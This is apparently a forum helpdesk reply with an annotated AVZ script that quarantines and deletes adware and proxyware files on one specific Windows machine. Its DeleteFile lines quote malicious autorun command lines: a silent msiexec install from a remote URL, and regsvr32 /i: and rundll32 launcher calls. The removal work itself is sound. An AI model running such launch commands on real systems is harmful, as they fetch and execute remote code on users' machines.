Выполните скрипт в AVZ
Код:
// AVZ remediation script written for one specific machine: every path below is
// hard-coded (including the profile folder "user"), so it should not be reused
// on another system without re-checking each entry against that system's logs.
// Statement order matters: copies are quarantined first, deletions follow, and
// the Boot Cleaner import / system-clean steps run last.
begin
// Switch on AVZPM (AVZ's process-monitoring driver) before any file is touched.
SetAVZPMStatus(True);
// Step 1: place copies of the suspect executables in AVZ quarantine so that
// samples remain available for analysis after the deletions below.
// The second argument is passed as an empty string in every call.
QuarantineFile('c:\programdata\mysampleservice\sys.exe','');
QuarantineFile('c:\programdata\tiser\run.exe','');
QuarantineFile('c:\programdata\prefssecure\nettrans.exe','');
QuarantineFile('C:\Users\user\AppData\Local\lumsystem\Luminati\net_svc.exe','');
QuarantineFile('c:\users\user\appdata\local\mail.ru\mailruupdater.exe','');
QuarantineFile('C:\Users\user\AppData\Local\lumsystem\lumsystem.exe','');
// NOTE(review): appmallosayov.exe (deleted next) and 993380d4.dll (named in a
// regsvr32 line further down) are never passed to QuarantineFile, so this
// script keeps no sample of either file.
// Step 2: delete the files. The '32' mode argument presumably selects the
// 32-bit file-system view -- confirm against the AVZ script reference.
DeleteFile('c:\programdata\appmallosayov\appmallosayov.exe','32');
// lumsystem.exe is queued through BC_DeleteFile instead of DeleteFile --
// presumably so Boot Cleaner removes it at the next boot; confirm.
BC_DeleteFile('C:\Users\user\AppData\Local\lumsystem\lumsystem.exe');
DeleteFile('c:\users\user\appdata\local\mail.ru\mailruupdater.exe','32');
DeleteFile('C:\Users\user\AppData\Local\lumsystem\Luminati\net_svc.exe','32');
DeleteFile('c:\programdata\prefssecure\nettrans.exe','32');
DeleteFile('c:\programdata\tiser\run.exe','32');
DeleteFile('c:\programdata\mysampleservice\sys.exe','32');
// The next four calls repeat paths already handled above; only the letter
// case of the path differs.
DeleteFile('C:\ProgramData\MySampleService\sys.exe','32');
DeleteFile('C:\ProgramData\AppmallosayoV\AppmallosayoV.exe','32');
DeleteFile('C:\ProgramData\tiser\run.exe','32');
DeleteFile('C:\ProgramData\PrefsSecure\Nettrans.exe','32');
// NOTE(review): the four arguments below are whole command lines, not file
// paths: a shell-style value that chains msiexec /i with a remote URL after
// explorer.exe, a rundll32 url,FileProtocolHandler call that opens a URL, and
// two regsvr32 /s /n /i: calls that load a DLL. They look like launch entries
// copied from an autorun log -- confirm. Whether DeleteFile (or the later
// ExecuteSysClean) acts on such strings is not visible from this script, so
// check the post-reboot autorun log to make sure these entries are gone.
// The first regsvr32 argument ends at '{99338~1.' and looks truncated.
DeleteFile('explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj1WFjw2MdRYFjY3FjF4RUQQMTY4RYRYNTM1F8FyRWM4Rq== /q','32');
DeleteFile('C:\Windows\System32\rundll32.exe url,FileProtocolHandler http://www.mail.ru/cnt/20775012?gp=','32');
DeleteFile('C:\Windows\SysWOW64\regsvr32.exe /n /s /i:/52d7db659c384df7 /q C:\Users\user\AppData\Local\0FB3B0~1\{99338~1.','32');
DeleteFile('C:\Windows\system32\regsvr32.exe /s /n /i:/rt C:\PROGRA~3\af8235af\993380d4.dll','32');
// Step 3: hand the accumulated lists to Boot Cleaner (the BC_ calls) --
// presumably the deleted-file list first, then all remaining lists; confirm.
BC_ImportDeletedList;
BC_ImportAll;
// Run AVZ's system clean; presumably this removes leftover references to the
// files deleted above -- confirm against the AVZ script reference.
ExecuteSysClean;
// Run the 'TSW' wizard with arguments 2, 3, true; the meaning of the numeric
// arguments is not visible here -- check the AVZ documentation.
ExecuteWizard('TSW',2,3,true);
// Arm Boot Cleaner. The script itself contains no reboot call, while the
// accompanying instructions expect a reboot before the follow-up log is made.
BC_Activate;
end.
После перезагрузки выложите
образ автозапуска